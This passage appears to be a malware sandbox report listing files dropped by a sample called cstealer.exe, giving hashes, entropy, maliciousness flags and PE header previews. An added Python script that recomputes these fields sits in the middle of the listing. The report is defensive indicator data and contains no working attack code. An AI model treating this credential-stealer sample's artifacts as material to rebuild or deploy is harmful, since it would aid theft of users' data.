SHA-512:05171C867A5D373D4F6420136B6AC29FA846A85B30085F9D7FABCBB4D902AFEE00716DD52010ED90E97C18E6CB4E915F13F31A15B2D8507E3A6CFA80E513B6A2
Malicious:true

Process: C:\Users\user\AppData\Local\Temp\cstealer.exe
File Type: PE32+ executable (DLL) (console) x86-64, for MS Windows
Category: dropped
Size (bytes): 98736
Entropy (8bit): 6.474996871326343
Encrypted: false
SSDEEP: 1536:BxhUQePlHhR46rXHHGI+mAAD4AeDuXMycecb8i10DWZz:Bvk4wHH+mZD4ADAecb8G1
MD5: F12681A472B9DD04A812E16096514974
SHA1: 6FD102EB3E0B0E6EEF08118D71F28702D1A9067C
SHA-256: D66C3B47091CEB3F8D3CC165A43D285AE919211A0C0FCB74491EE574D8D464F8
SHA-512: 7D3ACCBF84DE73FB0C5C0DE812A9ED600D39CD7ED0F99527CA86A57CE63F48765A370E913E3A46FFC2CCD48EE07D823DAFDD157710EEF9E7CC1EB7505DC323A2
Malicious: true

Process: C:\Users\user\AppData\Local\Temp\cstealer.exe
File Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 83328
Entropy (8bit): 6.532254531979707
Encrypted: false
SSDEEP: 1536:douLz7p5Tcayt0KpkKWVa5cNRT8+smUxJIDtVH7SyD8Px:2uLz9meVamQ+sLxJIDtVHVsx
MD5: 4101128E19134A4733028CFAAFC2F3BB
SHA1: 66C18B0406201C3CFBBA6E239AB9EE3DBB3BE07D
SHA-256: 5843872D5E2B08F138A71FE9BA94813AFEE59C8B48166D4A8EB0F606107A7E80
SHA-512: 4F2FC415026D7FD71C5018BC2FFDF37A5B835A417B9E5017261849E36D65375715BAE148CE8F9649F9D807A63AC09D0FB270E4ABAE83DFA371D129953A5422CA
Malicious: true

Process: C:\Users\user\AppData\Local\Temp\cstealer.exe
File Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 123768
Entropy (8bit): 6.017133084000375
Encrypted: false
SSDEEP: 3072:QC7Pgg3AwEWwSQJKoPfLSHcn0YJwyncXf9IDQPj6Exv:Qz5IX8jPfLSMJwykfoy
MD5: 6A9CA97C039D9BBB7ABF40B53C851198
SHA1: 01BCBD134A76CCD4F3BADB5F4056ABEDCFF60734
SHA-256: E662D2B35BB48C5F3432BDE79C0D20313238AF800968BA0FAA6EA7E7E5EF4535
SHA-512: DEDF7F98AFC0A94A248F12E4C4CA01B412DA45B926DA3F9C4CBC1D2CBB98C8899F43F5884B1BF1F0B941EDAEEF65612EA17438E67745962FF13761300910960D
Malicious: true

Process: C:\Users\user\AppData\Local\Temp\cstealer.exe
File Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 251768
Entropy (8bit): 6.543870948107038
Encrypted: false
SSDEEP: 6144:3JhhPXoWcz5HvcQpq9Sr9pmHboiYE9qWM53pLW1AmXYWtmVS9G:fNXoWcznq9Sr9pyKFh6eS9G
MD5: D47E6ACF09EAD5774D5B471AB3AB96FF
SHA1: 64CE9B5D5F07395935DF95D4A0F06760319224A2
SHA-256: D0DF57988A74ACD50B2D261E8B5F2C25DA7B940EC2AAFBEE444C277552421E6E
SHA-512: 52E132CE94F21FA253FED4CF1F67E8D4423D8C30224F961296EE9F64E2C9F4F7064D4C8405CD3BB67D3CF880FE4C21AB202FA8CF677E3B4DAD1BE6929DBDA4E2
Malicious: true

Process: C:\Users\user\AppData\Local\Temp\cstealer.exe
File Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 63872
Entropy (8bit): 6.166853300594844
Encrypted: false
SSDEEP: 1536:18njpHxGkYjEEEJkn8cw6ThID5IJt7SyiPx:GnjpHxRJ8w6ThID5IJtEx
MD5: DE4D104EA13B70C093B07219D2EFF6CB
SHA1: 83DAF591C049F977879E5114C5FEA9BBBFA0AD7B
SHA-256: 39BC615842A176DB72D4E0558F3CDCAE23AB0623AD132F815D21DCFBFD4B110E
SHA-512: 567F703C2E45F13C6107D767597DBA762DC5CAA86024C87E7B28DF2D6C77CD06D3F1F97EED45E6EF127D5346679FEA89AC4DC2C453CE366B6233C0FA68D82692
Malicious: true

Process: C:\Users\user\AppData\Local\Temp\cstealer.exe
File Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 158080
Entropy (8bit): 6.835761878596918
Encrypted: false
SSDEEP: 3072:5mGf4k8d79MwyHiRr7tznf49mNoaGjQJplJIDe10Yhx:5Pf4FhMwyMAYOao6P
MD5: 337B0E65A856568778E25660F77BC80A
SHA1: 4D9E921FEAEE5FA70181EBA99054FFA7B6C9BB3F
SHA-256: 613DE58E4A9A80EFF8F8BC45C350A6EAEBF89F85FFD2D7E3B0B266BF0888A60A
SHA-512: 19E6DA02D9D25CCEF06C843B9F429E6B598667270631FEBE99A0D12FC12D5DA4FB242973A8351D3BF169F60D2E17FE821AD692038C793CE69DFB66A42211398E
Malicious: true

Process: C:\Users\user\AppData\Local\Temp\cstealer.exe
File Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 31104
Entropy (8bit): 6.35436407327013
Encrypted: false
SSDEEP: 384:cQuCvO+MZFryl9SDCg6rXv5mkWsnTBq9ID7UJIYiSy1pCQYIPxh8E9VF0Nyb9:cl+yFp6rXRmk5s9ID7UeYiSyv7PxWER
MD5: FF8300999335C939FCCE94F2E7F039C0
SHA1: 4FF3A7A9D9CA005B5659B55D8CD064D2EB708B1A
SHA-256: 2F71046891BA279B00B70EB031FE90B379DBE84559CF49CE5D1297EA6BF47A78
SHA-512: F29B1FD6F52130D69C8BD21A72A71841BF67D54B216FEBCD4E526E81B499B9B48831BB7CDFF0BFF6878AAB542CA05D6326B8A293F2FB4DD95058461C0FD14017
Malicious: true

Process: C:\Users\user\AppData\Local\Temp\cstealer.exe
File Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 78200
Entropy (8bit): 6.239347454910878
Encrypted: false
SSDEEP: 1536:HJlcAdpEVuju9/s+S+pJGQRivVia3i9IDQw17Sy+Px3sxi:H7ce+uju9/sT+pJGdvVp3i9IDQw1kxZ
MD5: 8140BDC5803A4893509F0E39B67158CE
SHA1: 653CC1C82BA6240B0186623724AEC3287E9BC232
SHA-256: 39715EF8D043354F0AB15F62878530A38518FB6192BC48DA6A098498E8D35769
SHA-512: D0878FEE92E555B15E9F01CE39CFDC3D6122B41CE00EC3A4A7F0F661619F83EC520DCA41E35A1E15650FB34AD238974FE8019577C42CA460DDE76E3891B0E826
Malicious: true

Process: C:\Users\user\AppData\Local\Temp\cstealer.exe
File Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 118656
Entropy (8bit): 6.2256831065058815
Encrypted: false
SSDEEP: 3072:fArVnbGK9SGnh8u6rqMD6ciFCrl14zZvV9NdJRvdO5yt6sqM7VjEP/OsYpxtXr9T:YrVSK9SGnh8u6ESx5CVQP/yXZ
MD5: D4324D1E8DB7FCF220C5C541FECCE7E3
SHA1: 1CAF5B23AE47F36D797BC6BDD5B75B2488903813
SHA-256: DDBED9D48B17C54FD3005F5A868DD63CB8F3EFE2C22C1821CEBB2FE72836E446
SHA-512: 71D56D59E019CF42CEA88203D9C6E50F870CD5C4D5C46991ACBFF3AB9FF13F78D5DBF5D1C2112498FC7E279D41EE27DB279B74B4C08A60BB4098F9E8C296B5D8
Malicious: true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......pU..44..44..44..=Ls.04...O.64...O..54...O.94...O.<4...O.74...O.14...F.64..44.15...O.=4...O..54...O..54...O.54..Rich44..........................PE..d.....Vc.........." ...!............ ....................................................`..........................................Z..P....Z...........................)..............T...........................p...@............................................text............................... ..`.rdata..\...........................@..@.data................n..............@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):159616
                                                                                                                                                          Entropy (8bit):5.9948013841482926
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:qFrIQQey4VWR98w/PQQcXo8uOVrGxn+SQOXLkd1ItS+Q8YuAfxJIDt75EHx:eEeRV29//4QcJuOynyvxX
                                                                                                                                                          MD5:069BCCC9F31F57616E88C92650589BDD
                                                                                                                                                          SHA1:050FC5CCD92AF4FBB3047BE40202D062F9958E57
                                                                                                                                                          SHA-256:CB42E8598E3FA53EEEBF63F2AF1730B9EC64614BDA276AB2CD1F1C196B3D7E32
                                                                                                                                                          SHA-512:0E5513FBE42987C658DBA13DA737C547FF0B8006AECF538C2F5CF731C54DE83E26889BE62E5C8A10D2C91D5ADA4D64015B640DAB13130039A5A8A5AB33A723DC
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B3"..RL,.RL,.RL,.*.,.RL,.)M-.RL,.)I-.RL,.)H-.RL,.)O-.RL,.)M-.RL,b(M-.RL,.RM,.SL,. M-.RL,.)A-.RL,.)L-.RL,.).,.RL,.)N-.RL,Rich.RL,........................PE..d.....Vc.........." ...!............l+....................................................`.............................................d............`.......P.......F...)...p..4... ...T...............................@...............x............................text............................... ..`.rdata..............................@..@.data....j.......f..................@....pdata.......P......."..............@..@.rsrc........`......................@..@.reloc..4....p.......8..............@..B........................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1439447
                                                                                                                                                          Entropy (8bit):5.58639468240011
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24576:6QRqL5TPAxNWlUKdcubgAnj90H0AWfh7dYMbP/Medfw:6QRqL2xNbeA
                                                                                                                                                          MD5:83D235E1F5B0EE5B0282B5AB7244F6C4
                                                                                                                                                          SHA1:629A1CE71314D7ABBCE96674A1DDF9F38C4A5E9C
                                                                                                                                                          SHA-256:DB389A9E14BFAC6EE5CCE17D41F9637D3FF8B702CC74102DB8643E78659670A0
                                                                                                                                                          SHA-512:77364AFF24CFC75EE32E50973B7D589B4A896D634305D965ECBC31A9E0097E270499DBEC93126092EB11F3F1AD97692DB6CA5927D3D02F3D053336D6267D7E5F
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:PK..........!. ..y............_collections_abc.pyc............................................d.Z.d.d.l.m.Z.m.Z...d.d.l.Z...e.e.e.........................Z...e.d...............Z.d...Z...e.e...............Z.[.g.d...Z.d.Z...e...e.d.............................Z...e...e...e...........................................Z...e...e.i.................................................................Z...e...e.i.................................................................Z...e...e.i.................................................................Z...e...e.g.............................Z...e...e...e.g...........................................Z...e...e...e.d...........................................Z...e...e...e.d.d.z.............................................Z...e...e...e...........................................Z...e...e.d.............................Z ..e...e.d.............................Z!..e...e...e"..........................................Z#..e.i.......................................
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:ASCII text
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):292541
                                                                                                                                                          Entropy (8bit):6.048162209044241
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6144:QW1x/M8fRR1jplkXURrVADwYCuCigT/Q5MSRqNb7d8iu5NF:QWb/TRJLWURrI55MWavdF0D
                                                                                                                                                          MD5:D3E74C9D33719C8AB162BAA4AE743B27
                                                                                                                                                          SHA1:EE32F2CCD4BC56CA68441A02BF33E32DC6205C2B
                                                                                                                                                          SHA-256:7A347CA8FEF6E29F82B6E4785355A6635C17FA755E0940F65F15AA8FC7BD7F92
                                                                                                                                                          SHA-512:E0FB35D6901A6DEBBF48A0655E2AA1040700EB5166E732AE2617E89EF5E6869E8DDD5C7875FA83F31D447D4ABC3DB14BFFD29600C9AF725D9B03F03363469B4C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.# Issuer: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Subject: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Label: "GlobalSign Root CA".# Serial: 4835703278459707669005204.# MD5 Fingerprint: 3e:45:52:15:09:51:92:e1:b7:5d:37:9f:b1:87:29:8a.# SHA1 Fingerprint: b1:bc:96:8b:d4:f4:9d:62:2a:a8:9a:81:f2:15:01:52:a4:1d:82:9c.# SHA256 Fingerprint: eb:d4:10:40:e4:bb:3e:c7:42:c9:e3:81:d3:1e:f2:a4:1a:48:b6:68:5c:96:e7:ce:f3:c1:df:6c:d4:33:1c:99.-----BEGIN CERTIFICATE-----.MIIDdTCCAl2gAwIBAgILBAAAAAABFUtaw5QwDQYJKoZIhvcNAQEFBQAwVzELMAkG.A1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExEDAOBgNVBAsTB1Jv.b3QgQ0ExGzAZBgNVBAMTEkdsb2JhbFNpZ24gUm9vdCBDQTAeFw05ODA5MDExMjAw.MDBaFw0yODAxMjgxMjAwMDBaMFcxCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9i.YWxTaWduIG52LXNhMRAwDgYDVQQLEwdSb290IENBMRswGQYDVQQDExJHbG9iYWxT.aWduIFJvb3QgQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDaDuaZ.jc6j40+Kfvvxi4Mla+pIH/EqsLmVEQS98GPR4mdmzxzdzxtIK+6NiY6arymAZavp.xy0Sy6scTHAHoT0KMM0VjU/43dSMUBUc71DuxC73/OlS8pF94G3VNTCOXkNz
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):10752
                                                                                                                                                          Entropy (8bit):4.673454313041419
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:KG+p72HzA5iJGhU2Y0hQMsQJCUCLsZEA4elh3XQMtCFliHUWQcX6g8cim1qeSju1:A2HzzU2bRYoeLHkcqgvimoe
                                                                                                                                                          MD5:723EC2E1404AE1047C3EF860B9840C29
                                                                                                                                                          SHA1:8FC869B92863FB6D2758019DD01EDBEF2A9A100A
                                                                                                                                                          SHA-256:790A11AA270523C2EFA6021CE4F994C3C5A67E8EAAAF02074D5308420B68BD94
                                                                                                                                                          SHA-512:2E323AE5B816ADDE7AAA14398F1FDB3EFE15A19DF3735A604A7DB6CADC22B753046EAB242E0F1FBCD3310A8FBB59FF49865827D242BAF21F44FD994C3AC9A878
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B..............................M....................................... ...?.......?.......?.a.....?.......Rich............................PE..d...siAe.........." ...%.....................................................p............`..........................................'..p...`(..d....P.......@...............`..,...`#.............................. "..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...8....0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......&..............@..@.reloc..,....`.......(..............@..B................................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):119296
                                                                                                                                                          Entropy (8bit):5.872097486056729
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:OzgMw0g+m/+rxC9Jtd960WsCyqPD1/bZMlDML48Be9zGTVmZRJIRbvB:OsTH+VC9Jtd9VdCr7fMp/8yGTVmzmZ
                                                                                                                                                          MD5:9EA8098D31ADB0F9D928759BDCA39819
                                                                                                                                                          SHA1:E309C85C1C8E6CE049EEA1F39BEE654B9F98D7C5
                                                                                                                                                          SHA-256:3D9893AA79EFD13D81FCD614E9EF5FB6AAD90569BEEDED5112DE5ED5AC3CF753
                                                                                                                                                          SHA-512:86AF770F61C94DFBF074BCC4B11932BBA2511CAA83C223780112BDA4FFB7986270DC2649D4D3EA78614DBCE6F7468C8983A34966FC3F2DE53055AC6B5059A707
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..r...r...r......r...s...r...s...r...w...r...v..r...q...r.#.s...r...s...r..8z...r..8r...r..8....r..8p...r.Rich..r.........................PE..d...siAe.........." ...%.*..........0........................................ ............`.........................................p...d..........................................Px...............................w..@............@...............................text...X).......*.................. ..`.rdata...X...@...Z..................@..@.data...8=.......0..................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):3441504
                                                                                                                                                          Entropy (8bit):6.097985120800337
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:49152:8TKuk2CQIU6iV9OjPWgBqIVRIaEv5LY/RnQ2ETEvrPnkbsYNPsNwsML1CPwDv3u6:Vv+KRi5KsEKsY+NwsG1CPwDv3uFfJu
                                                                                                                                                          MD5:6F4B8EB45A965372156086201207C81F
                                                                                                                                                          SHA1:8278F9539463F0A45009287F0516098CB7A15406
                                                                                                                                                          SHA-256:976CE72EFD0A8AEEB6E21AD441AA9138434314EA07F777432205947CDB149541
                                                                                                                                                          SHA-512:2C5C54842ABA9C82FB9E7594AE9E264AC3CBDC2CC1CD22263E9D77479B93636799D0F28235AC79937070E40B04A097C3EA3B7E0CD4376A95ED8CA90245B7891F
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........a...2...2...2...2...2..3...2..3...2..3...2..3...2...2...2L.3...2..3...2..3.2..3...2..p2...2..3...2Rich...2........................PE..d...m..b.........." ... ..$...................................................4....../5...`..........................................h/..h...*4.@....`4.|....`2.....Z4.`)...p4..O....,.8...........................`.,.@............ 4..............................text.....$.......$................. ..`.rdata........$.......$.............@..@.data...!z....1..,....1.............@....pdata.......`2.......1.............@..@.idata..^#... 4..$....3.............@..@.00cfg..u....P4.......3.............@..@.rsrc...|....`4.......3.............@..@.reloc...x...p4..z....3.............@..B................................................................................................................................................
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):35064
                                                                                                                                                          Entropy (8bit):6.362215445656998
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:SB8J4ihYfwYiXGPc9orPji8i4DDQWvGaRQsTeCXS/Fzc7jsFruRXYV1ZE9DRCXjQ:rGHs4vpegQsTT0uj82S7Fp2DG4yshH
                                                                                                                                                          MD5:32D36D2B0719DB2B739AF803C5E1C2F5
                                                                                                                                                          SHA1:023C4F1159A2A05420F68DAF939B9AC2B04AB082
                                                                                                                                                          SHA-256:128A583E821E52B595EB4B3DDA17697D3CA456EE72945F7ECCE48EDEDAD0E93C
                                                                                                                                                          SHA-512:A0A68CFC2F96CB1AFD29DB185C940E9838B6D097D2591B0A2E66830DD500E8B9538D170125A00EE8C22B8251181B73518B73DE94BEEEDD421D3E888564A111C1
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X................d.....N...................5...N......N......N....................................Rich............................PE..d....$(a.........." .....H...*.......L..............................................4.....`..........................................l.......o..P...............8....l..........(....b...............................c..8............`.. ............................text....G.......H.................. ..`.rdata..X....`.......L..............@..@.data................b..............@....pdata..8............d..............@..@.reloc..(............j..............@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):702816
                                                                                                                                                          Entropy (8bit):5.547832370836076
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12288:UUnBMlBGdU/t0voUYHgqRJd7a7+JLvrfX7bOI8Fp0D6WuHU2lvzR:UN/t0vMnffOI8Fp0D6TU2lvzR
                                                                                                                                                          MD5:8769ADAFCA3A6FC6EF26F01FD31AFA84
                                                                                                                                                          SHA1:38BAEF74BDD2E941CCD321F91BFD49DACC6A3CB6
                                                                                                                                                          SHA-256:2AEBB73530D21A2273692A5A3D57235B770DAF1C35F60C74E01754A5DAC05071
                                                                                                                                                          SHA-512:FAC22F1A2FFBFB4789BDEED476C8DAF42547D40EFE3E11B41FADBC4445BB7CA77675A31B5337DF55FDEB4D2739E0FB2CBCAC2FEABFD4CD48201F8AE50A9BD90B
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.p*..p*..p*......p*...+..p*.\.+..p*.../..p*......p*...)..p*...+..p*..p+.iq*......p*...*..p*.....p*...(..p*.Rich.p*.........PE..d......b.........." ... .B...T......<.....................................................`.........................................@A...N..@U..........s........M......`)......h...0...8...............................@............@..@............................text....@.......B.................. ..`.rdata..J/...`...0...F..............@..@.data...AM.......D...v..............@....pdata...V.......X..................@..@.idata..%W...@...X..................@..@.00cfg..u............j..............@..@.rsrc...s............l..............@..@.reloc..l............t..............@..B................................................................................................................................................................
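The dropped-file entries above all carry the same set of fields: a file type derived from magic bytes, size, 8-bit entropy, an Encrypted flag, SSDEEP, and MD5/SHA1/SHA-256/SHA-512 digests, plus a printable Preview of the first bytes. The Python script below is an added example, not part of Joe Sandbox or of the analysed sample, that recomputes those fields from raw bytes so that a file pulled out of the sandbox can be cross-checked against the listing. It uses only the standard library, so SSDEEP (which needs the third-party ssdeep binding) is left out; the entropy cutoff used for the Encrypted flag is an assumption, since the page does not state the threshold the sandbox applies; the sample input is a constructed minimal PE32+ DLL header, not one of the files listed.

```python
"""Recompute the per-file fields shown in a sandbox dropped-file entry.

Added example, not Joe Sandbox tooling. Standard library only; SSDEEP omitted.
"""
import hashlib
import math
import struct
from collections import Counter

# Assumed cutoff for the "Encrypted" flag; the report does not state its own.
ENCRYPTED_ENTROPY_THRESHOLD = 7.5


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte (0.0 .. 8.0), the 'Entropy (8bit)' field."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def guess_file_type(data: bytes) -> str:
    """Magic-byte classifier covering the file types that appear in the listing."""
    if data[:2] == b"MZ" and len(data) >= 0x40:
        e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
        # COFF header (24 bytes) + enough of the optional header to reach Subsystem (offset 68)
        if len(data) >= e_lfanew + 24 + 70 and data[e_lfanew:e_lfanew + 4] == b"PE\0\0":
            machine, = struct.unpack_from("<H", data, e_lfanew + 4)
            characteristics, = struct.unpack_from("<H", data, e_lfanew + 22)
            magic, = struct.unpack_from("<H", data, e_lfanew + 24)
            subsystem, = struct.unpack_from("<H", data, e_lfanew + 24 + 68)
            fmt = "PE32+" if magic == 0x20B else "PE32"
            kind = "DLL" if characteristics & 0x2000 else "EXE"   # IMAGE_FILE_DLL
            subsys = {2: "GUI", 3: "console"}.get(subsystem, "unknown subsystem")
            arch = {0x8664: "x86-64", 0x14C: "Intel 80386"}.get(machine, hex(machine))
            return f"{fmt} executable ({kind}) ({subsys}) {arch}, for MS Windows"
        return "MS-DOS executable"
    if data[:4] == b"PK\x03\x04":
        return "Zip archive data"
    if data and all(32 <= b < 127 or b in (9, 10, 13) for b in data):
        return "ASCII text"
    return "data"


def preview(data: bytes, length: int = 64) -> str:
    """Render bytes like the report's Preview column: printable ASCII kept, all else as '.'."""
    return "".join(chr(b) if 32 <= b < 127 else "." for b in data[:length])


def describe(data: bytes) -> dict:
    """Produce the same field set the listing shows for one dropped file."""
    entropy = shannon_entropy(data)
    return {
        "File Type": guess_file_type(data),
        "Size (bytes)": len(data),
        "Entropy (8bit)": entropy,
        "Encrypted": entropy >= ENCRYPTED_ENTROPY_THRESHOLD,
        "MD5": hashlib.md5(data).hexdigest().upper(),
        "SHA1": hashlib.sha1(data).hexdigest().upper(),
        "SHA-256": hashlib.sha256(data).hexdigest().upper(),
        "SHA-512": hashlib.sha512(data).hexdigest().upper(),
        "Preview": preview(data),
    }


def build_fake_pe32plus_dll() -> bytes:
    """Constructed minimal PE32+ DLL header for demonstration; not a real or loadable binary."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)        # e_lfanew: PE header follows the DOS header
    # Signature, Machine=AMD64, 0 sections, timestamp, symtab ptr, nsyms, opt hdr size, chars
    coff = struct.pack("<4sHHIIIHH", b"PE\0\0", 0x8664, 0, 0, 0, 0, 240, 0x0002 | 0x2000)
    opt = bytearray(240)
    struct.pack_into("<H", opt, 0, 0x20B)          # PE32+ magic
    struct.pack_into("<H", opt, 68, 2)             # Subsystem: IMAGE_SUBSYSTEM_WINDOWS_GUI
    return bytes(dos) + coff + bytes(opt)


if __name__ == "__main__":
    for key, value in describe(build_fake_pe32plus_dll()).items():
        print(f"{key}:{value}")
```

When cross-checking a file recovered from the sandbox, the four digests must match the listing byte for byte; any mismatch means a different file was pulled or the artifact was altered in transit, and the entropy value is the quickest tell for a packed or encrypted payload that the type string alone would not reveal.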
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):5758328
                                                                                                                                                          Entropy (8bit):6.089726305084683
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:98304:JdHwQkq3AAtsPv3XXTVEspHBMp4SsPxQpe2bx:JdHwQkq3AMsPvHXSpAxQpe2V
                                                                                                                                                          MD5:9A24C8C35E4AC4B1597124C1DCBEBE0F
                                                                                                                                                          SHA1:F59782A4923A30118B97E01A7F8DB69B92D8382A
                                                                                                                                                          SHA-256:A0CF640E756875C25C12B4A38BA5F2772E8E512036E2AC59EB8567BF05FFBFB7
                                                                                                                                                          SHA-512:9D9336BF1F0D3BC9CE4A636A5F4E52C5F9487F51F00614FC4A34854A315CE7EA8BE328153812DBD67C45C75001818FA63317EBA15A6C9A024FA9F2CAB163165B
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ih.-...-...-...r../...r@.#...r..!...r..%...r..)...$q..7....{..&...-...H...r......r..,...rB.,...r..,...Rich-...........PE..d...R.Vc.........." ...!.T%..,7......K........................................\......~X...`.........................................P.@......NA......`[.......V../....W.x)...p[..B....).T...........................P.).@............p%..............................text...BS%......T%................. ..`.rdata..0....p%......X%.............@..@.data.........A..N...\A.............@....pdata.../....V..0....Q.............@..@PyRuntim......X.......S.............@....rsrc........`[......fV.............@..@.reloc...B...p[..D...pV.............@..B........................................................................................................................................................................................................
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):29056
                                                                                                                                                          Entropy (8bit):6.49468173344972
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:5oR1ecReJKwHqUuI7A70RUZ9ID7GvIYiSy1pCQlIJNPxh8E9VF0NyUT2:ezeUeJlHqybG9ID7GQYiSyvCPxWEC
                                                                                                                                                          MD5:97EE623F1217A7B4B7DE5769B7B665D6
                                                                                                                                                          SHA1:95B918F3F4C057FB9C878C8CC5E502C0BD9E54C0
                                                                                                                                                          SHA-256:0046EB32F873CDE62CF29AF02687B1DD43154E9FD10E0AA3D8353D3DEBB38790
                                                                                                                                                          SHA-512:20EDC7EAE5C0709AF5C792F04A8A633D416DA5A38FC69BD0409AFE40B7FB1AFA526DE6FE25D8543ECE9EA44FD6BAA04A9D316AC71212AE9638BDEF768E661E0F
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........>.t^_f'^_f'^_f'W'.'\_f'.$g&\_f'.$c&R_f'.$b&V_f'.$e&Z_f'.$g&\_f'^_g'._f'.-g&[_f'.$k&__f'.$f&__f'.$.'__f'.$d&__f'Rich^_f'........PE..d...e.Vc.........." ...!.....2............................................................`..........................................@..L...,A..x....p.......`.......H...)......L....3..T............................2..@............0...............................text............................... ..`.rdata.......0......................@..@.data........P.......6..............@....pdata.......`.......8..............@..@.rsrc........p.......<..............@..@.reloc..L............F..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1481088
                                                                                                                                                          Entropy (8bit):6.569811736013214
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24576:GjhOK/D8n/vDz5YZ/9T6F2MkEvTPdZklaOPSwfzDJ8CVjBx+Xt4V9zQXeRxd:IX/CDzGZ1T01TPPk76oDJ8qKXavzQOR
